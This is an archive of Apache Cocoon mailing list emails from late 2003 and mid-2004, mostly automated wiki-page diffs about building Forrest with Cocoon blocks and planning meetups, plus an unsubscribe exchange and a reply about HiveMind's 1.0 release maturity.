daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 09:00:17 -0000 Received: (qmail 45892 invoked by uid 500); 30 Dec 2003 08:59:52 -0000 Delivered-To: [email protected] Received: (qmail 45863 invoked by uid 500); 30 Dec 2003 08:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45851 invoked from network); 30 Dec 2003 08:59:52 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 08:59:52 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBU904O30027 for <[email protected]>; Tue, 30 Dec 2003 10:00:04 +0100 Date: Tue, 30 Dec 2003 10:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] AddingCocoonBlocksToForrest Tue Dec 30 10:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=AddingCocoonBlocksToForrest , version: 2 on Tue Dec 30 08:25:14 2003 by DavidCrossley - This how-to is useful for all those that wish to build Forrest version 0.5+ with blocks that are not part of the default Forrest build. For example XSP, XMLDB or XMLForm etc... In this how-to we will show how to build XSP into Forrest (NB as of 0.6-dev XSP is included with Forrest, however, this is still a useful How-To).\\ ? ^^^ ^^ + This how-to is useful for all those that wish to build Forrest version 0.5+ with blocks that are not part of the default Forrest build. For example XSP, XMLDB or CocoonForms etc... In this how-to we will show how to build XSP into Forrest (n.b. as of 0.6-dev XSP is included with Forrest, however, this is still a useful How-To).\\ ? ^^^^^^ + ^^^^ - Why do this? Well Forrest has a lot of features that are great, it's a fantastic way to quickly create and manage a project. It would be nice though to able to extend Forrest.\\ ? ^ + Why do this? Well Forrest has a lot of features that are great, it is a fantastic way to quickly create and manage a project. It would be nice though to able to extend Forrest.\\ ? ^^ - Firstly make sure that you have Forrest 0.5 distribution and the CVS distribution of Cocoon-2.1, Nekodtd and Nekopull. If you're unsure about CVS go [here | http://xml.apache.org/cvs.html] and you can get Nekodtd and Nekopull from here:\\ + Firstly make sure that you have at least Forrest 0.5 distribution, and the CVS distribution of Cocoon-2.1, and Nekodtd, and Nekopull. If you're unsure about CVS go [here | http://xml.apache.org/cvs.html] and you can get Nekodtd and Nekopull from here:\\ ? +++++++++ + ++++ + - Having downloaded and extracted everything you should now have a folder with all these distributions in it, it is important that these live on the same level or there be more editing to do.\\ ? - ^ ^ + Having downloaded and extracted everything, you should now have a folder with all these distributions in it. It is important that these live on the same level or there be more editing to do.\\ ? + ^ ^ - Now we need to copy the local.blocks.properties file from Forrest to Cocoon, in terminal:\\ ? ^ ^ + Now we need to copy the local.blocks.properties file from Forrest to Cocoon. In a terminal window, do:\\ ? ^ ^ ++ +++++++++++ - Next edit this file to include all the blocks that you want to build into Forrest. This is done by un-commenting all the required blocks.\\ ? - + Next edit this file to include all the blocks that you want to build into Forrest. This is done by un-commenting all the required blocks.\\ - Next we have to tell Forrest what kind of build we are performing.Performing a "real_with_cvs" build copies upgraded jars to their official lib/* locations, and 'cvs + Next we have to tell Forrest what kind of build we are performing. Performing a "real_with_cvs" build copies upgraded jars to their official lib/* locations, and 'cvs ? + - add's them, if you are not a commiter to Forrest you will not be able to CVS add them. If you are a commiter you best be very sure that you actually want to upgrade the version of Cocoon in Forrest's CVS. In most cases you will only want to upgrade your local copy. To do this we want to do a "testing" or "real" build. The problem with "testing" is that the upgrade is only done in your build directory and so each time you rebuild forrest your upgrade will be blown away - consider copying your custom build of Cocoon somewhere safe so you can easily copy it back into place if you rebuild Forrest. You will probably want to use "real", this updates your local official libs so that they will not be blown away when rebuilding Forrest. Uncomment the line you want as follows: + add's them, if you are not a commiter to Forrest you will not be able to CVS add them. If you are a commiter you best be very sure that you actually want to upgrade the version of Cocoon in Forrest's CVS. In most cases you will only want to upgrade your local copy. To do this, we want to do a "testing" or "real" build. The problem with "testing" is that the upgrade is only done in your build directory and so each time you rebuild forrest your upgrade will be blown away - consider copying your custom build of Cocoon somewhere safe so you can easily copy it back into place if you rebuild Forrest. You will probably want to use "real", this updates your local official libs so that they will not be blown away when rebuilding Forrest. Uncomment the line you want as follows: ? + - Importantly for XSP to work in Forrest we must also include\\ + Importantly, for XSP to work in Forrest we must also include\\ ? + - Next in terminal run ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh'', this can take a while. ? - ^ ^ + Next in a terminal window, run ''xml-forrest/etc/cocoon_upgrade/upgrade_cocoon_jars.sh''. This can take a while. ? ++ ++++++++ ^ ^ - You can now create a Forrest project and seed it and it will now have any of the blocks that you've requested. This method should be able to build any block into Forrest, just make sure that the block you require does not have additional dependencies. ? ^^^ ^^^ ------- ^ ^ ^^^^^^^^^^ - - + You can now create a Forrest project with 'forrest seed' and it will now have the blocks that you've requested. With this method you should be able to build any block into Forrest. Ensure that the block you require does not have additional dependencies. ? ^^^^^^^^^^^^^ ^ ^^^^^^ ++++ ^ ^^ - __N.B__: Sometimes Forrest will not build because it loses the forrest.build.xml (''xml-forrest/build.dist/shbat/forrest.build.xml'') If you already have a copy of this save it so you can use it later if needed. Also the same seems to happen sometimes with jing-*.jar (''xml-forrest/lib/core/jing-*.jar''), if this happens you can grab this jar from the Forrest CVS site. ? ^ ^ - + __n.b.__ Sometimes Forrest will not build because it loses the forrest.build.xml (''xml-forrest/build.dist/shbat/forrest.build.xml'') If you already have a copy of this save it so you can use it later if needed. Also the same seems to happen sometimes with jing-*.jar (''xml-forrest/lib/core/jing-*.jar''), if this happens you can grab this jar from the Forrest CVS site. ? ^ ^^ From [email protected] Tue Dec 30 10:00:19 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21101 invoked from network); 30 Dec 2003 10:00:19 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 10:00:19 -0000 Received: (qmail 93769 invoked by uid 500); 30 Dec 2003 09:59:52 -0000 Delivered-To: [email protected] Received: (qmail 93738 invoked by uid 500); 30 Dec 2003 09:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 93651 invoked from network); 30 Dec 2003 09:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 09:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBUA03O30075 for <[email protected]>; Tue, 30 Dec 2003 11:00:04 +0100 Date: Tue, 30 Dec 2003 11:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WritingGenerators Tue Dec 30 11:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WritingGenerators , version: 14 on Tue Dec 30 09:30:17 2003 by Con - Write a Class whitch extends from AbstractGenerator. ? - + Write a Class which extends from {{AbstractGenerator}}. ? ++ ++ - In the method generate() use the xmlConsumer (this.xmlConsumer) to create SAX-Events. + In the method {{generate()}} use the xmlConsumer ({{this.xmlConsumer}}) to create SAX-Events. ? ++ ++ ++ ++ From [email protected] Tue Dec 30 13:00:05 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75158 invoked from network); 30 Dec 2003 13:00:05 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 13:00:05 -0000 Received: (qmail 23712 invoked by uid 500); 30 Dec 2003 13:00:03 -0000 Delivered-To: [email protected] Received: (qmail 23581 invoked by uid 500); 30 Dec 2003 13:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23565 invoked from network); 30 Dec 2003 13:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 13:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBUD02O30177 for <[email protected]>; Tue, 30 Dec 2003 14:00:02 +0100 Date: Tue, 30 Dec 2003 14:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupParis Tue Dec 30 14:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupParis , version: 11 on Tue Dec 30 12:45:20 2003 by AlexandreVictoor + * [Alexandre Victoor|AlexandreVictoor] From [email protected] Tue Dec 30 17:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84763 invoked from network); 30 Dec 2003 17:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 17:00:09 -0000 Received: (qmail 83083 invoked by uid 500); 30 Dec 2003 17:00:02 -0000 Delivered-To: [email protected] Received: (qmail 83052 invoked by uid 500); 30 Dec 2003 17:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83033 invoked from network); 30 Dec 2003 17:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 17:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBUH03O30280 for <[email protected]>; Tue, 30 Dec 2003 18:00:03 +0100 Date: Tue, 30 Dec 2003 18:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Tue Dec 30 18:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 129 on Tue Dec 30 16:44:51 2003 by 161.129.204.104 + * ''[Content Negotiation|http://norman.walsh.name/2003/07/02/conneg]'' an overview by Norman Walsh From [email protected] Tue Dec 30 17:02:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85927 invoked from network); 30 Dec 2003 17:02:21 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 17:02:21 -0000 Received: (qmail 89508 invoked by uid 500); 30 Dec 2003 17:02:14 -0000 Delivered-To: [email protected] Received: (qmail 89486 invoked by uid 500); 30 Dec 2003 17:02:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 89475 invoked from network); 30 Dec 2003 17:02:13 -0000 Received: from unknown (HELO ritig9.rit.reuters.com) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 17:02:13 -0000 Date: Tue, 30 Dec 2003 12:02:09 -0500 From: Peter Liang <[email protected]> Subject: RE: [WIKI-UPDATE] LenyaI18N Tue Dec 30 18:00:03 2003 To: [email protected] MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft Exchange V6.0.6487.1 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: quoted-printable Thread-Topic: [WIKI-UPDATE] LenyaI18N Tue Dec 30 18:00:03 2003 Thread-Index: AcPO9mZKBYGXuzeGTjuwjbA+fgkywgAADIrA content-class: urn:content-classes:message X-MS-Has-Attach: X-MS-TNEF-Correlator: X-OriginalArrivalTime: 30 Dec 2003 17:02:10.0401 (UTC) FILETIME=[A9E30510:01C3CEF6] X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Please remove me from your mailing list. Thanks Peter -----Original Message----- From: [email protected] [mailto:[email protected]]=20 Sent: Tuesday, December 30, 2003 12:00 PM To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Tue Dec 30 18:00:03 2003 Page: http://wiki.cocoondev.org/Wiki.jsp?page=3DLenyaI18N , version: 129 on Tue Dec 30 16:44:51 2003 by 161.129.204.104 + * ''[Content Negotiation|http://norman.walsh.name/2003/07/02/conneg]'' an overview by Norman Walsh ----------------------------------------------------------------- Visit our Internet site at http://www.reuters.com Get closer to the financial markets with Reuters Messaging - for more information and to register, visit http://www.reuters.com/messaging Any views expressed in this message are those of the individual sender, except where the sender specifically states them to be the views of Reuters Ltd. From [email protected] Tue Dec 30 19:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27654 invoked from network); 30 Dec 2003 19:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 19:00:10 -0000 Received: (qmail 82529 invoked by uid 500); 30 Dec 2003 19:00:01 -0000 Delivered-To: [email protected] Received: (qmail 82398 invoked by uid 500); 30 Dec 2003 19:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 82384 invoked from network); 30 Dec 2003 19:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 19:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBUJ03O30414 for <[email protected]>; Tue, 30 Dec 2003 20:00:04 +0100 Date: Tue, 30 Dec 2003 20:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Tue Dec 30 20:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 131 on Tue Dec 30 18:25:59 2003 by 161.129.204.104 - * [mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html] + * [Apache mod_negotiation|http://httpd.apache.org/docs/content-negotiation.html] ? +++++++ - * [mod_negotiation (Apache2)|http://httpd.apache.org/docs-2.0/content-negotiation.html] ? ---------- + * [Apache2 mod_negotiation|http://httpd.apache.org/docs-2.0/content-negotiation.html] ? ++++++++ From [email protected] Tue Dec 30 22:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97848 invoked from network); 30 Dec 2003 22:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Dec 2003 22:00:11 -0000 Received: (qmail 87240 invoked by uid 500); 30 Dec 2003 21:59:59 -0000 Delivered-To: [email protected] Received: (qmail 87211 invoked by uid 500); 30 Dec 2003 21:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87199 invoked from network); 30 Dec 2003 21:59:58 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 30 Dec 2003 21:59:58 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBUM03O30491 for <[email protected]>; Tue, 30 Dec 2003 23:00:03 +0100 Date: Tue, 30 Dec 2003 23:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Tue Dec 30 23:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 132 on Tue Dec 30 21:48:01 2003 by RolfKulemann From [email protected] Wed Dec 31 03:14:56 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91842 invoked from network); 31 Dec 2003 03:14:56 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Dec 2003 03:14:56 -0000 Received: (qmail 81268 invoked by uid 500); 31 Dec 2003 03:14:38 -0000 Delivered-To: [email protected] Received: (qmail 81240 invoked by uid 500); 31 Dec 2003 03:14:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 22263 invoked from network); 31 Dec 2003 01:35:09 -0000 Message-ID: <[email protected]> Date: Tue, 30 Dec 2003 20:35:05 -0500 From: Vadim Gritsenko <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] CC: [email protected] Subject: Re: [WIKI-UPDATE] LenyaI18N Tue Dec 30 18:00:03 2003 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Authentication-Info: Submitted using SMTP [email protected] from [161.129.204.104] at Tue, 30 Dec 2003 19:35:16 -0600 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Peter Liang wrote: >Please remove me from your mailing list. > > From your email: list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Vadim From [email protected] Wed Dec 31 15:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88136 invoked from network); 31 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Dec 2003 15:00:07 -0000 Received: (qmail 28003 invoked by uid 500); 31 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 27928 invoked by uid 500); 31 Dec 2003 15:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27909 invoked from network); 31 Dec 2003 15:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 31 Dec 2003 15:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBVF03O31252 for <[email protected]>; Wed, 31 Dec 2003 16:00:03 +0100 Date: Wed, 31 Dec 2003 16:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFriday FirstFridayJanuary2004 Wed Dec 31 16:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFriday , version: 22 on Wed Dec 31 15:02:39 2003 by DavidCrossley + * [FirstFridayJanuary2004] - The next FirstFriday will take place on [5 December 2003|FirstFridayDecember2003]. ? ^ ^^^^^^^ ^ ^^^^^^^ ^ + The next FirstFriday will take place on [2 January 2004|FirstFridayJanuary2004]. ? ^ ^^^^^ + ^ ^^^^^ + ^ - See [TimeAndDateMeetingPlanner|http://www.timeanddate.com/worldclock/meetingtime.html?day=5&month=12&year=2003&p1=48&p2=176&p3=240&p4=234&p5=213] ? ^ - ^ + See [TimeAndDateMeetingPlanner|http://www.timeanddate.com/worldclock/meetingtime.html?day=2&month=1&year=2004&p1=48&p2=176&p3=240&p4=234&p5=213] ? ^ ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayJanuary2004 , version: 1 on Wed Dec 31 15:07:18 2003 by DavidCrossley New page created: + Note-taking and co-ordination page for the [FirstFriday] of 2 January 2004. + + Please keep these notes concise. The idea of this page is to tell the overall story of this FirstFriday and not the details. + + !!General issues to be solved + * As usual, try to reduce/tidy/comment/commit the Bugzilla entries (see [HowWeUseBugzilla], includes prepared bugzilla queries). + * It does not matter if nobody attends - FirstFriday is still happening. + From [email protected] Wed Dec 31 16:00:26 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5469 invoked from network); 31 Dec 2003 16:00:25 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 31 Dec 2003 16:00:25 -0000 Received: (qmail 75358 invoked by uid 500); 31 Dec 2003 16:00:03 -0000 Delivered-To: [email protected] Received: (qmail 75209 invoked by uid 500); 31 Dec 2003 16:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75084 invoked from network); 31 Dec 2003 16:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 31 Dec 2003 16:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBVG02O31279 for <[email protected]>; Wed, 31 Dec 2003 17:00:03 +0100 Date: Wed, 31 Dec 2003 17:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFriday FirstFridayJanuary2004 Wed Dec 31 17:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFriday , version: 22 on Wed Dec 31 15:02:39 2003 by DavidCrossley + * [FirstFridayJanuary2004] - The next FirstFriday will take place on [5 December 2003|FirstFridayDecember2003]. ? ^ ^^^^^^^ ^ ^^^^^^^ ^ + The next FirstFriday will take place on [2 January 2004|FirstFridayJanuary2004]. ? ^ ^^^^^ + ^ ^^^^^ + ^ - See [TimeAndDateMeetingPlanner|http://www.timeanddate.com/worldclock/meetingtime.html?day=5&month=12&year=2003&p1=48&p2=176&p3=240&p4=234&p5=213] ? ^ - ^ + See [TimeAndDateMeetingPlanner|http://www.timeanddate.com/worldclock/meetingtime.html?day=2&month=1&year=2004&p1=48&p2=176&p3=240&p4=234&p5=213] ? ^ ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayJanuary2004 , version: 1 on Wed Dec 31 15:07:18 2003 by DavidCrossley New page created: + Note-taking and co-ordination page for the [FirstFriday] of 2 January 2004. + + Please keep these notes concise. The idea of this page is to tell the overall story of this FirstFriday and not the details. + + !!General issues to be solved + * As usual, try to reduce/tidy/comment/commit the Bugzilla entries (see [HowWeUseBugzilla], includes prepared bugzilla queries). + * It does not matter if nobody attends - FirstFriday is still happening. +
From [email protected] Thu Jul 01 19:16:44 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32651 invoked from network); 1 Jul 2004 19:16:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Jul 2004 19:16:43 -0000 Received: (qmail 44918 invoked by uid 500); 1 Jul 2004 19:16:33 -0000 Delivered-To: [email protected] Received: (qmail 44784 invoked by uid 500); 1 Jul 2004 19:16:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44566 invoked by uid 99); 1 Jul 2004 19:16:28 -0000 X-ASF-Spam-Status: No, hits=1.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS,HTML_70_80,HTML_MESSAGE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO sccrmhc11.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 01 Jul 2004 12:16:25 -0700 Received: from almightybeast (h0010b50ed00a.ne.client2.attbi.com[161.129.204.104]) by comcast.net (sccrmhc11) with SMTP id <2004070119160101100j07b6e>; Thu, 1 Jul 2004 19:16:02 +0000 From: "Howard M. Lewis Ship" <[email protected]> To: <[email protected]>, <[email protected]> Subject: RE: Time plan for Hivemind release 1.0 Date: Thu, 1 Jul 2004 15:15:52 -0400 Message-ID: <001801c45f9f$d35a5d50$6501a8c0@ALMIGHTYBEAST> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0019_01C45F7E.4C48BD50" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.4510 In-Reply-To: <000001c45f96$57666d00$6b3cfea9@mutter> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0019_01C45F7E.4C48BD50 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I'd rather respond on the HiveMind user mailing list. =20 There is a vote currently to release 1.0 beta-1. =20 The framework is very mature in my opinion; it wasn't slapped together = like some open-source projects. It has some hardcore TDD (test driven development) going on in = there to give me confidence that it all works. =20 =20 I've had no problems with Javassist with either HiveMind or Tapestry. = We're using just a fraction (perhaps a stable fraction) of what Javassist can do ... creating new = classes at runtime, not modifying classes that are already in existence. Again, it works = because the HiveMind test suite contains well over 400 tests and most of those create dozens of new = classes using Javassist. =20 =20 -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com <http://howardlewisship.com/>=20 -----Original Message----- From: [email protected] [mailto:[email protected]]=20 Sent: Thursday, July 01, 2004 2:08 PM To: [email protected] Subject: Time plan for Hivemind release 1.0 Hi Howard, =20 do you have kind of a plan when to release Hivemind 1.0 beta and 1.0? =20 I read the Hivemind documentation quite thoroughly and tried it out = practically. I think it is really a helpful framework for our J2EE software. However I'm a bit concerned about its immaturity, at least judging by = its early pre-release state. =20 The other thing that worries me a bit is this javassist thing. I didn't = have the time to look more closely into it yet. But a colleague of mine warned that it is quite = immature either and that it plays around with byte code in a way that is a bit unusual. =20 Can you make a clarifying statement on that? =20 Thanks, Matthias Burbach =20 ------=_NextPart_000_0019_01C45F7E.4C48BD50 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML xmlns=3D"http://www.w3.org/TR/REC-html40" xmlns:o =3D=20 "urn:schemas-microsoft-com:office:office" xmlns:w =3D=20 "urn:schemas-microsoft-com:office:word"><HEAD> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; = charset=3Dus-ascii"> <TITLE>Message</TITLE> <META content=3DWord.Document name=3DProgId> <META content=3D"MSHTML 6.00.2800.1400" name=3DGENERATOR> <META content=3D"Microsoft Word 10" name=3DOriginator><LINK=20 href=3D"cid:[email protected]" rel=3DFile-List><!--[if gte = mso 9]><xml> <o:OfficeDocumentSettings> <o:DoNotRelyOnCSS/> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:GrammarState>Clean</w:GrammarState> <w:DocumentKind>DocumentEmail</w:DocumentKind> <w:HyphenationZone>21</w:HyphenationZone> <w:EnvelopeVis/> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--> <STYLE>@page Section1 {size: 595.3pt 841.9pt; margin: 70.85pt 70.85pt = 2.0cm 70.85pt; mso-header-margin: 35.4pt; mso-footer-margin: 35.4pt; = mso-paper-source: 0; } P.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times 